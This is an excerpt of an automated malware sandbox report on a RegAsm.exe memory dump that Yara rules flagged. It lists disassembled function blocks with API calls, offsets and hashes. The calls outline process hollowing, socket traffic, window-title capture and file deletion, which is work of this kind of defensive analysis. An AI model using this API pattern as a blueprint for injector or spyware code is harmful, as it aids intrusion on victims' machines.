                                                  • Part of subcall function 10006D7E: _abort.LIBCMT ref: 10006DB0
                                                  • Part of subcall function 10006D7E: _free.LIBCMT ref: 10006DE4
                                                  • Part of subcall function 100069F3: GetOEMCP.KERNEL32(00000000,?,?,10006C7C,?), ref: 10006A1E
                                                • _free.LIBCMT ref: 10006CD7
                                                • _free.LIBCMT ref: 10006D0D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                • Instruction ID: 62e76a57c0cb8018fa5258269fd2d3c97d0f5aa08c1c35bbbea2ca126a332e06
                                                • Opcode Fuzzy Hash: edadbe4ca17b1bb3a790d59a6ed19414cc5eb62636eebdfc00c28812a33e9cae
                                                • Instruction Fuzzy Hash: AB31D835904249AFF700CB69DD81B5D77F6EF493A0F3141A9E8049B295EB76AD40CB50
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                                  • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                                  • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                                • _free.LIBCMT ref: 0044F050
                                                • _free.LIBCMT ref: 0044F086
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast_abort
                                                • String ID:
                                                • API String ID: 2991157371-0
                                                • Opcode ID: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                                • Opcode Fuzzy Hash: 5c488e73cd7317a59bb91e94e032dcb6bf067ffc0982221c2c2ef85a747d1bec
                                                • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                                APIs
                                                • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367,00000000), ref: 004485AA
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004485B7
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc__crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 2279764990-0
                                                • Opcode ID: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                • Instruction ID: be9fc4cf4793659cabcfb8eeb6b3f823a3a139bea871a56029073562aa2b3f0c
                                                • Opcode Fuzzy Hash: c6cf5396499d17f56fb6a2281c71017d1bec5fc69850f55703e39bd70672811c
                                                • Instruction Fuzzy Hash: 4B110637A00220BBFB229F1DDC4096F7395AB84364716866AFD19EB354DF34EC4186D9
                                                APIs
                                                • _free.LIBCMT ref: 00446227
                                                  • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?,0000000F,00000000,00432F93,00000000,0000000F,0042F99D,?,?,00431A44,?,?,00000000), ref: 00446263
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap$_free
                                                • String ID:
                                                • API String ID: 1482568997-0
                                                • Opcode ID: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                • Opcode Fuzzy Hash: b10fa1e8472e683284d1f6c52ed4eb802d80ccb8cfc65d6c0dd02300a023487f
                                                • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                  • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateEventStartupsocket
                                                • String ID:
                                                • API String ID: 1953588214-0
                                                • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                APIs
                                                • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                • String ID:
                                                • API String ID: 3750050125-0
                                                • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                APIs
                                                • GetForegroundWindow.USER32 ref: 0041BB49
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Window$ForegroundText
                                                • String ID:
                                                • API String ID: 29597999-0
                                                • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                APIs
                                                • getaddrinfo.WS2_32(00000000,00000000,00000000,00472ADC,004750E4,00000000,004151C3,00000000,00000001), ref: 00414F46
                                                • WSASetLastError.WS2_32(00000000), ref: 00414F4B
                                                  • Part of subcall function 00414DC1: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00414E10
                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414E52
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414E72
                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414E79
                                                  • Part of subcall function 00414DC1: LoadLibraryA.KERNEL32(?), ref: 00414EB1
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00414EC3
                                                  • Part of subcall function 00414DC1: FreeLibrary.KERNEL32(00000000), ref: 00414ECA
                                                  • Part of subcall function 00414DC1: GetProcAddress.KERNEL32(00000000,?), ref: 00414ED9
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                • String ID:
                                                • API String ID: 1170566393-0
                                                • Opcode ID: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                • Instruction ID: 64a5677b7ab27dcaa32d5743096e05a6e92bfc5102e3e8065abb212a99eff034
                                                • Opcode Fuzzy Hash: 63e6a57adcb3e9d376df8b1f7a36805de8af56205c6b0d3f673684859221182d
                                                • Instruction Fuzzy Hash: 23D017322005316BD320A769AC00AEBAA9EDFD6760B12003BBD08D2251DA949C8286E8
                                                APIs
                                                  • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                APIs
                                                  • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                • String ID:
                                                • API String ID: 806969131-0
                                                • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                APIs
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                  • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                  • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                  • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                  • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                • String ID:
                                                • API String ID: 2948481953-0
                                                • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                APIs
                                                • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 10005CB2
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                 • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: __crt_fast_encode_pointer
                                                • String ID:
                                                • API String ID: 3768137683-0
                                                • Opcode ID: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                • Instruction ID: bece27fcde9612dcc576c905fc453b1e46dde912844247b60aafe4dc7e802519
                                                • Opcode Fuzzy Hash: 309bc129bf2195ff1d9c64394061bd6fc65cf8cbf03cde5b7a92afcb69d4c1ae
                                                • Instruction Fuzzy Hash: D0118F37A007259FFB26DE18DD9095B73E5EB843E17168220ED18AB258DA32EC0196A1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: __alldvrm
                                                • String ID:
                                                • API String ID: 65215352-0
                                                • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                APIs
                                                • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                APIs
                                                • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Deallocatestd::_
                                                • String ID:
                                                • API String ID: 1323251999-0
                                                • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: send
                                                • String ID:
                                                • API String ID: 2809346765-0
                                                • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                                                • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                                                • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                                                APIs
                                                • SetEvent.KERNEL32(?,?), ref: 00407CF4
                                                • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                                                • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                                                  • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C37D
                                                  • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3AD
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C402
                                                  • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C463
                                                  • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C46A
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                  • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                                                • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                                                • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                                                • DeleteFileA.KERNEL32(?), ref: 0040868D
